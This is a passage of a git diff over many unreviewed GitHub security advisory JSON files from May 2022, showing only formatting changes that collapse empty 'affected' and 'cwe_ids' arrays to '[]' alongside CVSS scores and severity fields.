b/advisories/unreviewed/2022/05/GHSA-65qr-c565-757w/GHSA-65qr-c565-757w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-66gx-mppc-96f5/GHSA-66gx-mppc-96f5.json b/advisories/unreviewed/2022/05/GHSA-66gx-mppc-96f5/GHSA-66gx-mppc-96f5.json index 5cfc2305b7d..be4b562d134 100644 --- a/advisories/unreviewed/2022/05/GHSA-66gx-mppc-96f5/GHSA-66gx-mppc-96f5.json +++ b/advisories/unreviewed/2022/05/GHSA-66gx-mppc-96f5/GHSA-66gx-mppc-96f5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-69pj-m4hx-vx8v/GHSA-69pj-m4hx-vx8v.json b/advisories/unreviewed/2022/05/GHSA-69pj-m4hx-vx8v/GHSA-69pj-m4hx-vx8v.json index 002880b155b..ffa4c32c8dd 100644 --- a/advisories/unreviewed/2022/05/GHSA-69pj-m4hx-vx8v/GHSA-69pj-m4hx-vx8v.json +++ b/advisories/unreviewed/2022/05/GHSA-69pj-m4hx-vx8v/GHSA-69pj-m4hx-vx8v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6c39-3r29-pqmq/GHSA-6c39-3r29-pqmq.json b/advisories/unreviewed/2022/05/GHSA-6c39-3r29-pqmq/GHSA-6c39-3r29-pqmq.json index 649c20b5e39..35aeb68afd2 100644 --- a/advisories/unreviewed/2022/05/GHSA-6c39-3r29-pqmq/GHSA-6c39-3r29-pqmq.json +++ b/advisories/unreviewed/2022/05/GHSA-6c39-3r29-pqmq/GHSA-6c39-3r29-pqmq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6crc-98j4-wf83/GHSA-6crc-98j4-wf83.json b/advisories/unreviewed/2022/05/GHSA-6crc-98j4-wf83/GHSA-6crc-98j4-wf83.json index b495773efeb..cfa51c22263 100644 --- a/advisories/unreviewed/2022/05/GHSA-6crc-98j4-wf83/GHSA-6crc-98j4-wf83.json +++ b/advisories/unreviewed/2022/05/GHSA-6crc-98j4-wf83/GHSA-6crc-98j4-wf83.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6f7m-qfq2-4rxm/GHSA-6f7m-qfq2-4rxm.json b/advisories/unreviewed/2022/05/GHSA-6f7m-qfq2-4rxm/GHSA-6f7m-qfq2-4rxm.json index 3fcba495f29..0926c67311f 100644 --- a/advisories/unreviewed/2022/05/GHSA-6f7m-qfq2-4rxm/GHSA-6f7m-qfq2-4rxm.json +++ b/advisories/unreviewed/2022/05/GHSA-6f7m-qfq2-4rxm/GHSA-6f7m-qfq2-4rxm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6fjp-j9rq-frm5/GHSA-6fjp-j9rq-frm5.json b/advisories/unreviewed/2022/05/GHSA-6fjp-j9rq-frm5/GHSA-6fjp-j9rq-frm5.json index 355622100e6..3aadb71874c 100644 --- a/advisories/unreviewed/2022/05/GHSA-6fjp-j9rq-frm5/GHSA-6fjp-j9rq-frm5.json +++ b/advisories/unreviewed/2022/05/GHSA-6fjp-j9rq-frm5/GHSA-6fjp-j9rq-frm5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6gj5-hv4h-2jvw/GHSA-6gj5-hv4h-2jvw.json b/advisories/unreviewed/2022/05/GHSA-6gj5-hv4h-2jvw/GHSA-6gj5-hv4h-2jvw.json index 6d54d0b321e..66761bbc9bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gj5-hv4h-2jvw/GHSA-6gj5-hv4h-2jvw.json +++ b/advisories/unreviewed/2022/05/GHSA-6gj5-hv4h-2jvw/GHSA-6gj5-hv4h-2jvw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6gv7-83w6-79qj/GHSA-6gv7-83w6-79qj.json b/advisories/unreviewed/2022/05/GHSA-6gv7-83w6-79qj/GHSA-6gv7-83w6-79qj.json index 4b7e0d55b7d..fcaf7003498 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gv7-83w6-79qj/GHSA-6gv7-83w6-79qj.json +++ b/advisories/unreviewed/2022/05/GHSA-6gv7-83w6-79qj/GHSA-6gv7-83w6-79qj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6gwf-ww2j-gfrq/GHSA-6gwf-ww2j-gfrq.json b/advisories/unreviewed/2022/05/GHSA-6gwf-ww2j-gfrq/GHSA-6gwf-ww2j-gfrq.json index b22df22934d..a5e87edcb75 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gwf-ww2j-gfrq/GHSA-6gwf-ww2j-gfrq.json +++ b/advisories/unreviewed/2022/05/GHSA-6gwf-ww2j-gfrq/GHSA-6gwf-ww2j-gfrq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6gwm-q2fh-qvhr/GHSA-6gwm-q2fh-qvhr.json b/advisories/unreviewed/2022/05/GHSA-6gwm-q2fh-qvhr/GHSA-6gwm-q2fh-qvhr.json index d94777e1fba..c41425d10ed 100644 --- a/advisories/unreviewed/2022/05/GHSA-6gwm-q2fh-qvhr/GHSA-6gwm-q2fh-qvhr.json +++ b/advisories/unreviewed/2022/05/GHSA-6gwm-q2fh-qvhr/GHSA-6gwm-q2fh-qvhr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6hqp-6m2g-p9mx/GHSA-6hqp-6m2g-p9mx.json b/advisories/unreviewed/2022/05/GHSA-6hqp-6m2g-p9mx/GHSA-6hqp-6m2g-p9mx.json index 16396fc90a9..62bdd9b97d8 100644 --- a/advisories/unreviewed/2022/05/GHSA-6hqp-6m2g-p9mx/GHSA-6hqp-6m2g-p9mx.json +++ b/advisories/unreviewed/2022/05/GHSA-6hqp-6m2g-p9mx/GHSA-6hqp-6m2g-p9mx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6mfv-qfq6-3v2w/GHSA-6mfv-qfq6-3v2w.json b/advisories/unreviewed/2022/05/GHSA-6mfv-qfq6-3v2w/GHSA-6mfv-qfq6-3v2w.json index a359e93090f..ec0e2519308 100644 --- a/advisories/unreviewed/2022/05/GHSA-6mfv-qfq6-3v2w/GHSA-6mfv-qfq6-3v2w.json +++ b/advisories/unreviewed/2022/05/GHSA-6mfv-qfq6-3v2w/GHSA-6mfv-qfq6-3v2w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6p6q-g6w7-h5f9/GHSA-6p6q-g6w7-h5f9.json b/advisories/unreviewed/2022/05/GHSA-6p6q-g6w7-h5f9/GHSA-6p6q-g6w7-h5f9.json index e9bc01547d3..4378029b259 100644 --- a/advisories/unreviewed/2022/05/GHSA-6p6q-g6w7-h5f9/GHSA-6p6q-g6w7-h5f9.json +++ b/advisories/unreviewed/2022/05/GHSA-6p6q-g6w7-h5f9/GHSA-6p6q-g6w7-h5f9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6q4w-fhcp-mhw6/GHSA-6q4w-fhcp-mhw6.json b/advisories/unreviewed/2022/05/GHSA-6q4w-fhcp-mhw6/GHSA-6q4w-fhcp-mhw6.json index 3fdf0daca78..690b8968f51 100644 --- a/advisories/unreviewed/2022/05/GHSA-6q4w-fhcp-mhw6/GHSA-6q4w-fhcp-mhw6.json +++ b/advisories/unreviewed/2022/05/GHSA-6q4w-fhcp-mhw6/GHSA-6q4w-fhcp-mhw6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -51,9 +49,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6qh2-3h42-p5xv/GHSA-6qh2-3h42-p5xv.json b/advisories/unreviewed/2022/05/GHSA-6qh2-3h42-p5xv/GHSA-6qh2-3h42-p5xv.json index 63242dc2311..07603d97559 100644 --- a/advisories/unreviewed/2022/05/GHSA-6qh2-3h42-p5xv/GHSA-6qh2-3h42-p5xv.json +++ b/advisories/unreviewed/2022/05/GHSA-6qh2-3h42-p5xv/GHSA-6qh2-3h42-p5xv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6vp9-vc7c-884p/GHSA-6vp9-vc7c-884p.json b/advisories/unreviewed/2022/05/GHSA-6vp9-vc7c-884p/GHSA-6vp9-vc7c-884p.json index ca7c5894742..f07376a9042 100644 --- a/advisories/unreviewed/2022/05/GHSA-6vp9-vc7c-884p/GHSA-6vp9-vc7c-884p.json +++ b/advisories/unreviewed/2022/05/GHSA-6vp9-vc7c-884p/GHSA-6vp9-vc7c-884p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6w3j-vqwj-vw36/GHSA-6w3j-vqwj-vw36.json b/advisories/unreviewed/2022/05/GHSA-6w3j-vqwj-vw36/GHSA-6w3j-vqwj-vw36.json index b9ab638c437..08c740b3285 100644 --- a/advisories/unreviewed/2022/05/GHSA-6w3j-vqwj-vw36/GHSA-6w3j-vqwj-vw36.json +++ b/advisories/unreviewed/2022/05/GHSA-6w3j-vqwj-vw36/GHSA-6w3j-vqwj-vw36.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6wr3-pp75-368j/GHSA-6wr3-pp75-368j.json b/advisories/unreviewed/2022/05/GHSA-6wr3-pp75-368j/GHSA-6wr3-pp75-368j.json index 5d7b79970ff..977be16b232 100644 --- a/advisories/unreviewed/2022/05/GHSA-6wr3-pp75-368j/GHSA-6wr3-pp75-368j.json +++ b/advisories/unreviewed/2022/05/GHSA-6wr3-pp75-368j/GHSA-6wr3-pp75-368j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6www-r2fm-fcq7/GHSA-6www-r2fm-fcq7.json b/advisories/unreviewed/2022/05/GHSA-6www-r2fm-fcq7/GHSA-6www-r2fm-fcq7.json index ef4012760ae..563696502ca 100644 --- a/advisories/unreviewed/2022/05/GHSA-6www-r2fm-fcq7/GHSA-6www-r2fm-fcq7.json +++ b/advisories/unreviewed/2022/05/GHSA-6www-r2fm-fcq7/GHSA-6www-r2fm-fcq7.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-6x7f-c93g-qj43/GHSA-6x7f-c93g-qj43.json b/advisories/unreviewed/2022/05/GHSA-6x7f-c93g-qj43/GHSA-6x7f-c93g-qj43.json index 9f63f805e09..15e59ba6628 100644 --- a/advisories/unreviewed/2022/05/GHSA-6x7f-c93g-qj43/GHSA-6x7f-c93g-qj43.json +++ b/advisories/unreviewed/2022/05/GHSA-6x7f-c93g-qj43/GHSA-6x7f-c93g-qj43.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6xfp-mjg2-3r6j/GHSA-6xfp-mjg2-3r6j.json b/advisories/unreviewed/2022/05/GHSA-6xfp-mjg2-3r6j/GHSA-6xfp-mjg2-3r6j.json index 0ed5b83ed16..2679739d065 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xfp-mjg2-3r6j/GHSA-6xfp-mjg2-3r6j.json +++ b/advisories/unreviewed/2022/05/GHSA-6xfp-mjg2-3r6j/GHSA-6xfp-mjg2-3r6j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6xgj-8663-75f9/GHSA-6xgj-8663-75f9.json b/advisories/unreviewed/2022/05/GHSA-6xgj-8663-75f9/GHSA-6xgj-8663-75f9.json index ab25a561b5a..e4644ee8d7b 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xgj-8663-75f9/GHSA-6xgj-8663-75f9.json +++ b/advisories/unreviewed/2022/05/GHSA-6xgj-8663-75f9/GHSA-6xgj-8663-75f9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-72qx-wx8g-mph8/GHSA-72qx-wx8g-mph8.json b/advisories/unreviewed/2022/05/GHSA-72qx-wx8g-mph8/GHSA-72qx-wx8g-mph8.json index 8042183bdec..68cfa5ee66b 100644 --- a/advisories/unreviewed/2022/05/GHSA-72qx-wx8g-mph8/GHSA-72qx-wx8g-mph8.json +++ b/advisories/unreviewed/2022/05/GHSA-72qx-wx8g-mph8/GHSA-72qx-wx8g-mph8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-734w-96m8-gvgp/GHSA-734w-96m8-gvgp.json b/advisories/unreviewed/2022/05/GHSA-734w-96m8-gvgp/GHSA-734w-96m8-gvgp.json index ce15515c64f..c96e1b2542a 100644 --- a/advisories/unreviewed/2022/05/GHSA-734w-96m8-gvgp/GHSA-734w-96m8-gvgp.json +++ b/advisories/unreviewed/2022/05/GHSA-734w-96m8-gvgp/GHSA-734w-96m8-gvgp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7359-3f37-863c/GHSA-7359-3f37-863c.json b/advisories/unreviewed/2022/05/GHSA-7359-3f37-863c/GHSA-7359-3f37-863c.json index c8e4cd545ec..57a78622970 100644 --- a/advisories/unreviewed/2022/05/GHSA-7359-3f37-863c/GHSA-7359-3f37-863c.json +++ b/advisories/unreviewed/2022/05/GHSA-7359-3f37-863c/GHSA-7359-3f37-863c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7366-3322-xm88/GHSA-7366-3322-xm88.json b/advisories/unreviewed/2022/05/GHSA-7366-3322-xm88/GHSA-7366-3322-xm88.json index 11b3c7d552c..6998b9af539 100644 --- a/advisories/unreviewed/2022/05/GHSA-7366-3322-xm88/GHSA-7366-3322-xm88.json +++ b/advisories/unreviewed/2022/05/GHSA-7366-3322-xm88/GHSA-7366-3322-xm88.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-73wv-522w-4xjr/GHSA-73wv-522w-4xjr.json b/advisories/unreviewed/2022/05/GHSA-73wv-522w-4xjr/GHSA-73wv-522w-4xjr.json index b1be6a881f4..69cf24e22be 100644 --- a/advisories/unreviewed/2022/05/GHSA-73wv-522w-4xjr/GHSA-73wv-522w-4xjr.json +++ b/advisories/unreviewed/2022/05/GHSA-73wv-522w-4xjr/GHSA-73wv-522w-4xjr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-773j-5p8f-xh8r/GHSA-773j-5p8f-xh8r.json b/advisories/unreviewed/2022/05/GHSA-773j-5p8f-xh8r/GHSA-773j-5p8f-xh8r.json index 437b8189ebb..802e055ba4e 100644 --- a/advisories/unreviewed/2022/05/GHSA-773j-5p8f-xh8r/GHSA-773j-5p8f-xh8r.json +++ b/advisories/unreviewed/2022/05/GHSA-773j-5p8f-xh8r/GHSA-773j-5p8f-xh8r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-77jc-53mr-h9pm/GHSA-77jc-53mr-h9pm.json b/advisories/unreviewed/2022/05/GHSA-77jc-53mr-h9pm/GHSA-77jc-53mr-h9pm.json index 45bab73b9a0..c6e170cbb7e 100644 --- a/advisories/unreviewed/2022/05/GHSA-77jc-53mr-h9pm/GHSA-77jc-53mr-h9pm.json +++ b/advisories/unreviewed/2022/05/GHSA-77jc-53mr-h9pm/GHSA-77jc-53mr-h9pm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-77qc-wcq2-m5v2/GHSA-77qc-wcq2-m5v2.json b/advisories/unreviewed/2022/05/GHSA-77qc-wcq2-m5v2/GHSA-77qc-wcq2-m5v2.json index c87e1b10baf..9615a9daa6d 100644 --- a/advisories/unreviewed/2022/05/GHSA-77qc-wcq2-m5v2/GHSA-77qc-wcq2-m5v2.json +++ b/advisories/unreviewed/2022/05/GHSA-77qc-wcq2-m5v2/GHSA-77qc-wcq2-m5v2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-78gr-29vr-wj7c/GHSA-78gr-29vr-wj7c.json b/advisories/unreviewed/2022/05/GHSA-78gr-29vr-wj7c/GHSA-78gr-29vr-wj7c.json index 2880c420219..3d3853f1c98 100644 --- a/advisories/unreviewed/2022/05/GHSA-78gr-29vr-wj7c/GHSA-78gr-29vr-wj7c.json +++ b/advisories/unreviewed/2022/05/GHSA-78gr-29vr-wj7c/GHSA-78gr-29vr-wj7c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-79fv-qmj9-h56m/GHSA-79fv-qmj9-h56m.json b/advisories/unreviewed/2022/05/GHSA-79fv-qmj9-h56m/GHSA-79fv-qmj9-h56m.json index 3d0a1e5ddf4..052b93d4de8 100644 --- a/advisories/unreviewed/2022/05/GHSA-79fv-qmj9-h56m/GHSA-79fv-qmj9-h56m.json +++ b/advisories/unreviewed/2022/05/GHSA-79fv-qmj9-h56m/GHSA-79fv-qmj9-h56m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-79mr-4rjj-f8fv/GHSA-79mr-4rjj-f8fv.json b/advisories/unreviewed/2022/05/GHSA-79mr-4rjj-f8fv/GHSA-79mr-4rjj-f8fv.json index e79e2c2de8b..ecb774366a7 100644 --- a/advisories/unreviewed/2022/05/GHSA-79mr-4rjj-f8fv/GHSA-79mr-4rjj-f8fv.json +++ b/advisories/unreviewed/2022/05/GHSA-79mr-4rjj-f8fv/GHSA-79mr-4rjj-f8fv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7fgh-fc7p-p7v5/GHSA-7fgh-fc7p-p7v5.json b/advisories/unreviewed/2022/05/GHSA-7fgh-fc7p-p7v5/GHSA-7fgh-fc7p-p7v5.json index d39904e9fe4..1ba89aa4763 100644 --- a/advisories/unreviewed/2022/05/GHSA-7fgh-fc7p-p7v5/GHSA-7fgh-fc7p-p7v5.json +++ b/advisories/unreviewed/2022/05/GHSA-7fgh-fc7p-p7v5/GHSA-7fgh-fc7p-p7v5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7g4v-wf5m-rgj4/GHSA-7g4v-wf5m-rgj4.json b/advisories/unreviewed/2022/05/GHSA-7g4v-wf5m-rgj4/GHSA-7g4v-wf5m-rgj4.json index f411c89995c..bd39b241ba0 100644 --- a/advisories/unreviewed/2022/05/GHSA-7g4v-wf5m-rgj4/GHSA-7g4v-wf5m-rgj4.json +++ b/advisories/unreviewed/2022/05/GHSA-7g4v-wf5m-rgj4/GHSA-7g4v-wf5m-rgj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-7p4w-p3xm-vgfq/GHSA-7p4w-p3xm-vgfq.json b/advisories/unreviewed/2022/05/GHSA-7p4w-p3xm-vgfq/GHSA-7p4w-p3xm-vgfq.json index b929b14c4ff..2a28ba842eb 100644 --- a/advisories/unreviewed/2022/05/GHSA-7p4w-p3xm-vgfq/GHSA-7p4w-p3xm-vgfq.json +++ b/advisories/unreviewed/2022/05/GHSA-7p4w-p3xm-vgfq/GHSA-7p4w-p3xm-vgfq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-7qwh-rfjp-fwf4/GHSA-7qwh-rfjp-fwf4.json 